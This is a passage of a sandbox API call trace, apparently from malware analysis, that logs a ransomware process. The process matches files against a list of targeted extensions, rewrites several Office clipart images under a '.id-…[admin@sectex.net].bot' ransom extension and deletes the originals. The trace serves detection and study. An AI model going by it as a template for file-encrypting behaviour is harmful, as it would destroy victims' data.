	[0170.517] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString=".dbf") returned 4
	[0170.517] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString=".1cd") returned 4
	[0170.517] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString=".jpg") returned 4
	[0170.517] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.517] lstrlenW (lpString=".doc") returned 4
	[0170.517] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString=".docx") returned 5
	[0170.518] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0170.518] lstrlenW (lpString=".pdf") returned 4
	[0170.518] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString=".xls") returned 4
	[0170.518] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.518] lstrlenW (lpString=".xlsx") returned 5
	[0170.518] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0170.518] lstrlenW (lpString=".ppt") returned 4
	[0170.518] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.518] lstrlenW (lpString=".zip") returned 4
	[0170.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.518] lstrlenW (lpString=".rar") returned 4
	[0170.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString=".bz2") returned 4
	[0170.518] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString=".7z") returned 3
	[0170.518] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.518] lstrlenW (lpString=".dbf") returned 4
	[0170.518] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.518] lstrlenW (lpString=".1cd") returned 4
	[0170.518] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 63
	[0170.518] lstrlenW (lpString=".jpg") returned 4
	[0170.518] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.518] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.518] lstrlenW (lpString="J0175428.JPG") returned 12
	[0170.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.519] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14552) returned 1
	[0170.519] CloseHandle (hObject=0x350) returned 1
	[0170.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg")) returned 0x20
	[0170.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.520] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.520] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.520] GetLastError () returned 0x0
	[0170.520] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x38d8, lpOverlapped=0x0) returned 1
	[0170.522] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x38e0, lpOverlapped=0x0) returned 1
	[0170.524] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.524] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.524] SetEndOfFile (hFile=0x180) returned 1
	[0170.524] CloseHandle (hObject=0x180) returned 1
	[0170.524] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.524] SetEndOfFile (hFile=0x350) returned 1
	[0170.526] CloseHandle (hObject=0x350) returned 1
	[0170.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.526] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg")) returned 1
	[0170.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.527] lstrlenW (lpString=".doc") returned 4
	[0170.527] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.527] lstrlenW (lpString=".docx") returned 5
	[0170.527] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0170.527] lstrlenW (lpString=".pdf") returned 4
	[0170.527] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.527] lstrlenW (lpString=".xls") returned 4
	[0170.527] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.527] lstrlenW (lpString=".xlsx") returned 5
	[0170.527] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0170.527] lstrlenW (lpString=".ppt") returned 4
	[0170.527] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.527] lstrlenW (lpString=".zip") returned 4
	[0170.527] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.527] lstrlenW (lpString=".rar") returned 4
	[0170.528] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.528] lstrlenW (lpString=".bz2") returned 4
	[0170.528] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.528] lstrlenW (lpString=".7z") returned 3
	[0170.528] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.528] lstrlenW (lpString=".dbf") returned 4
	[0170.528] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.528] lstrlenW (lpString=".1cd") returned 4
	[0170.528] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.528] lstrlenW (lpString=".jpg") returned 4
	[0170.528] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.528] lstrlenW (lpString=".doc") returned 4
	[0170.528] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.528] lstrlenW (lpString=".docx") returned 5
	[0170.528] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0170.528] lstrlenW (lpString=".pdf") returned 4
	[0170.528] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.528] lstrlenW (lpString=".xls") returned 4
	[0170.528] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.528] lstrlenW (lpString=".xlsx") returned 5
	[0170.528] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0170.528] lstrlenW (lpString=".ppt") returned 4
	[0170.528] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.528] lstrlenW (lpString=".zip") returned 4
	[0170.528] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.528] lstrlenW (lpString=".rar") returned 4
	[0170.528] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.528] lstrlenW (lpString=".bz2") returned 4
	[0170.529] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.529] lstrlenW (lpString=".7z") returned 3
	[0170.529] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.529] lstrlenW (lpString=".dbf") returned 4
	[0170.529] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.529] lstrlenW (lpString=".1cd") returned 4
	[0170.529] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 63
	[0170.529] lstrlenW (lpString=".jpg") returned 4
	[0170.529] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.529] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.529] lstrlenW (lpString="J0177257.JPG") returned 12
	[0170.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.530] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=45358) returned 1
	[0170.530] CloseHandle (hObject=0x350) returned 1
	[0170.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg")) returned 0x20
	[0170.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.531] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.531] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.531] GetLastError () returned 0x0
	[0170.531] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xb12e, lpOverlapped=0x0) returned 1
	[0170.535] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xb130, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xb130, lpOverlapped=0x0) returned 1
	[0170.540] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.540] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.540] SetEndOfFile (hFile=0x180) returned 1
	[0170.540] CloseHandle (hObject=0x180) returned 1
	[0170.540] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.540] SetEndOfFile (hFile=0x350) returned 1
	[0170.542] CloseHandle (hObject=0x350) returned 1
	[0170.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.543] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg")) returned 1
	[0170.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.543] lstrlenW (lpString=".doc") returned 4
	[0170.543] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.544] lstrlenW (lpString=".docx") returned 5
	[0170.544] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0170.544] lstrlenW (lpString=".pdf") returned 4
	[0170.544] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.544] lstrlenW (lpString=".xls") returned 4
	[0170.544] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.544] lstrlenW (lpString=".xlsx") returned 5
	[0170.544] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0170.544] lstrlenW (lpString=".ppt") returned 4
	[0170.544] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.544] lstrlenW (lpString=".zip") returned 4
	[0170.544] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.544] lstrlenW (lpString=".rar") returned 4
	[0170.544] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.544] lstrlenW (lpString=".bz2") returned 4
	[0170.544] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.544] lstrlenW (lpString=".7z") returned 3
	[0170.544] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.544] lstrlenW (lpString=".dbf") returned 4
	[0170.544] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.544] lstrlenW (lpString=".1cd") returned 4
	[0170.544] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.544] lstrlenW (lpString=".jpg") returned 4
	[0170.544] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.544] lstrlenW (lpString=".doc") returned 4
	[0170.544] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.544] lstrlenW (lpString=".docx") returned 5
	[0170.544] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0170.545] lstrlenW (lpString=".pdf") returned 4
	[0170.545] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.545] lstrlenW (lpString=".xls") returned 4
	[0170.545] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.545] lstrlenW (lpString=".xlsx") returned 5
	[0170.545] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0170.545] lstrlenW (lpString=".ppt") returned 4
	[0170.545] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.545] lstrlenW (lpString=".zip") returned 4
	[0170.545] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.545] lstrlenW (lpString=".rar") returned 4
	[0170.545] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.545] lstrlenW (lpString=".bz2") returned 4
	[0170.545] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.545] lstrlenW (lpString=".7z") returned 3
	[0170.545] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.545] lstrlenW (lpString=".dbf") returned 4
	[0170.545] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.545] lstrlenW (lpString=".1cd") returned 4
	[0170.545] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 63
	[0170.545] lstrlenW (lpString=".jpg") returned 4
	[0170.545] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.545] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.545] lstrlenW (lpString="J0177806.JPG") returned 12
	[0170.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.611] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=55554) returned 1
	[0170.623] CloseHandle (hObject=0x350) returned 1
	[0170.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg")) returned 0x20
	[0170.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.625] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.625] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.625] GetLastError () returned 0x0
	[0170.625] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xd902, lpOverlapped=0x0) returned 1
	[0170.635] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xd910, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xd910, lpOverlapped=0x0) returned 1
	[0170.636] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.636] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.636] SetEndOfFile (hFile=0x180) returned 1
	[0170.637] CloseHandle (hObject=0x180) returned 1
	[0170.637] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.637] SetEndOfFile (hFile=0x350) returned 1
	[0170.639] CloseHandle (hObject=0x350) returned 1
	[0170.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.640] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg")) returned 1
	[0170.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.641] lstrlenW (lpString=".doc") returned 4
	[0170.641] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.641] lstrlenW (lpString=".docx") returned 5
	[0170.641] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0170.641] lstrlenW (lpString=".pdf") returned 4
	[0170.641] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.641] lstrlenW (lpString=".xls") returned 4
	[0170.641] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.641] lstrlenW (lpString=".xlsx") returned 5
	[0170.641] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0170.641] lstrlenW (lpString=".ppt") returned 4
	[0170.641] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.641] lstrlenW (lpString=".zip") returned 4
	[0170.641] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.641] lstrlenW (lpString=".rar") returned 4
	[0170.641] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.641] lstrlenW (lpString=".bz2") returned 4
	[0170.641] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.641] lstrlenW (lpString=".7z") returned 3
	[0170.641] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.641] lstrlenW (lpString=".dbf") returned 4
	[0170.641] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.641] lstrlenW (lpString=".1cd") returned 4
	[0170.641] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
